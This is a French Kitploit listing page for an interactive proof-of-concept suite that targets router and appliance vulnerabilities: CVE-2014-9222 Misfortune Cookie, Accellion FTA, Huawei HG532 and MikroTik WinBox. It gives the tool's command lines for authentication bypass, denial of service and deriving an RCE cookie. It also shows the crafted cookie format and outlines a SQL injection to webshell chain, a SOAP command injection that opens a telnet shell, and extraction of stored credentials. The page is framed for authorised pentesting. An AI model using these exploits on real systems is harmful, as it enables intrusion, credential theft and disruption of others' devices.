Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
misfortune-cookie — Suite de PoC interactive pour CVE-2014-9222 (Misfortune Cookie) et exploits de routeurs associés, proposant des modules de détection, de contournement d'authentification, de déni de service (DoS) et d'exécution de code à distance (RCE), avec un mode de scan pour plusieurs vulnérabilités. | Kitploit
Outils/GitHubGitHub/luel-4013/misfortune-cookie
Sécurité des Systèmes EmbarquésReconnaissanceScanners de VulnérabilitésSécurité IoTExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionExploitation de Binaires

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Suite de PoC interactive pour CVE-2014-9222 (Misfortune Cookie) et exploits de routeurs associés, proposant des modules de détection, de contournement d'authentification, de déni de service (DoS) et d'exécution de code à distance (RCE), avec un mode de scan pour plusieurs vulnérabilités.

GitHubluel-4013/misfortune-cookie

misfortune-cookie

Voir le dépôt
il y a 9h 22mPas encore vérifié
Partager

Suite de PoC pour CVE-2014-9222 « Misfortune Cookie »

Débordement de pile dans la gestion des cookies HTTP d'AllegroSoft RomPager (toutes les versions < 4.34). Une seule requête non authentifiée avec un en-tête Cookie: forgé corrompt la mémoire. Effets : contournement de l'authentification admin, DoS/redémarrage, et (avec des offsets spécifiques au firmware) exécution de code à distance.

À utiliser uniquement sur du matériel vous appartenant ou que vous êtes explicitement autorisé à tester.

Console interactive (recommandé)

root@kitploit:~
python3 main.py                # puis définir une cible avec [1]
python3 main.py http://192.168.1.1
root@kitploit:~
[1] Définir / changer de cible
[2] Empreinte de la cible
[3] Détecter la vulnérabilité (sûr, non destructif)
[4] Contournement de l'authentification (cookie magique)
[5] DoS / faire planter l'appareil  (DESTRUCTIF)
[6] Aide RCE - dériver le cookie à partir des adresses du firmware
[7] Recherche dans le tableau modèle / cookie
[8] Scanner toutes les vulnérabilités (sonde)
[A] Chaîne Accellion FTA (CVE-2021-27101 / 27102)
[B] Huawei HG532 (CVE-2017-17215)
[C] MikroTik WinBox (CVE-2018-14847)

Chaque action affiche d'abord ce qu'elle va faire ; le DoS nécessite de taper YES. L' empreinte par modèle (realm) est auto-détectée à partir de l'en-tête WWW-Authenticate et comparée au tableau des cookies.

Scan (option 8)

[8] sonde un hôte contre les quatre familles de vulnérabilités avec des vérifications non destructives et affiche lesquelles sont joignables/probablement vulnérables :

root@kitploit:~
python3 scan.py http://192.168.1.1
python3 scan.py http://192.168.1.1 --winbox-port 8291 --hg532-port 37215

Ensuite, exécutez l'entrée de menu correspondante ([3]/[4]/[A]/[B]/[C]) pour exploiter celle qui est confirmée.

PoC supplémentaires (même console)

En plus de Misfortune Cookie, la console regroupe des PoC pour trois autres vulnérabilités courantes d'appareils embarqués/appliances :

  • [A] Accellion FTA (accellion_fta.py) - reproduit la chaîne UNC2546 décrite par Mandiant : récupérer le secret w1 via une injection SQL à travers un en-tête Host forgé (/courier/oauth.api), puis déclencher admin.pl pour écrire un webshell eval, et le vérifier. 27103 (SSRF) / 27104 (exécution de commande post-auth) sont notés mais pas exercés par défaut.
  • [B] Huawei HG532 (huawei_hg532.py) - POST SOAP vers /ctrlt/DeviceUpgrade_1 avec $(<cmd>) dans NewStatusURL, authentification HTTP Digest dslf-config:admin ; la commande par défaut ouvre un shell lié telnet sur 9999.
  • [C] MikroTik WinBox () - lecture de fichier par traversée de répertoire sur le protocole WinBox ; par défaut lit et déchiffre les identifiants stockés ( XOR).

Tous les PoC supplémentaires nécessitent une confirmation explicite dans la console.

CLI autonome (mêmes moteurs)

root@kitploit:~
python3 detect.py http://192.168.1.1                      # vérification sûre
python3 auth_bypass.py http://192.168.1.1                 # modèle auto-détecté
python3 auth_bypass.py http://192.168.1.1 --restore       # réactiver l'authentification
python3 auth_bypass.py http://192.168.1.1 --all           # essayer tous les cookies connus
python3 auth_bypass.py http://192.168.1.1 --brute         # exhaustif (TRÈS lent, plante)
python3 dos.py http://192.168.1.1                         # planter / redémarrer (DESTRUCTIF)
python3 rce/derive_cookie.py 0x803E9A40 0x803AB30D        # adresses -> (num, pad)

Fichiers

Format du cookie magique

root@kitploit:~
Cookie: C<evilnum>=<pad "B" octets><payload>;

evilnum et pad sont spécifiques au firmware. evilnum indexe le tableau de cookies de 0x28 octets de RomPager (C_Array + evilnum*0x28 + pad = adresse écrasée). Le tableau par modèle fusionné depuis exploitdb 39739 et le module Metasploit allegro_rompager_auth_bypass se trouve dans common.py.

Chemin RCE

Nécessite une image firmware exacte. Étapes (voir rce/README.md) : extraire le rootfs avec binwalk, rétro-concevoir l'analyseur de cookies dans Ghidra pour trouver le delta tampon -> $ra sauvegardé, dériver (num, pad) avec derive_cookie.py, valider le shellcode MIPS contre une image émulée par QEMU avant de toucher la cible en direct.

Références

  • https://nvd.nist.gov/vuln/detail/CVE-2014-9222
  • https://web.archive.org/web/20141231080506/http://mis.fortunecook.ie/
  • Metasploit : auxiliary/scanner/http/allegro_rompager_misfortune_cookie et auxiliary/admin/http/allegro_rompager_auth_bypass
  • ExploitDB 39739 (suppresseur d'authentification Misfortune Cookie)
Télécharger l’outil
VulnérabilitéCVECe que fait la sonde
RomPagerCVE-2014-9222Bannière HTTP + version vs 4.34
Huawei HG532CVE-2017-17215Point de terminaison SOAP actif + realm Digest
MikroTik WinBoxCVE-2018-14847lecture de fichier WinBox en direct (identifiants extraits)
Accellion FTACVE-2021-27101/104Empreinte Accellion/oauth.api
MenuCVECiblePort
[A]CVE-2021-27101/27102Accellion FTA80
[B]CVE-2017-17215Huawei HG53237215
[C]CVE-2018-14847MikroTik WinBox8291
mikrotik_winbox.py
flash/rw/store/user.dat
md5(user + "283i4jfkai3389")
fichierobjectif
main.pyconsole interactive
ui.pybannière + aides UI (header/info/warn/err/success/prompt/confirm)
common.pyempreinte, constructeur de cookie magique, tableau par modèle (num, pad)
detect.pyvérification de vulnérabilité non destructive (version + cookie canari)
scan.pysonde une cible contre les quatre familles de vulnérabilités (option 8)
auth_bypass.pycontournement d'authentification par cookie magique avec auto-détection du realm
dos.pyécrasement de pile par cookie surdimensionné -> redémarrage par watchdog
accellion_fta.pyCVE-2021-27101/27102 SQLi -> chaîne webshell
huawei_hg532.pyCVE-2017-17215 injection de commande SOAP
mikrotik_winbox.pyCVE-2018-14847 lecture de fichier WinBox / extraction d'identifiants
rce/derive_cookie.pytransformer C_Array + adresse cible en (num, pad)
rce/README.mdméthodologie RCE complète + calculs d'exploitation
rce/references/diapositives 31C3, livre blanc NCC, analyses démystifiées, tableaux de disposition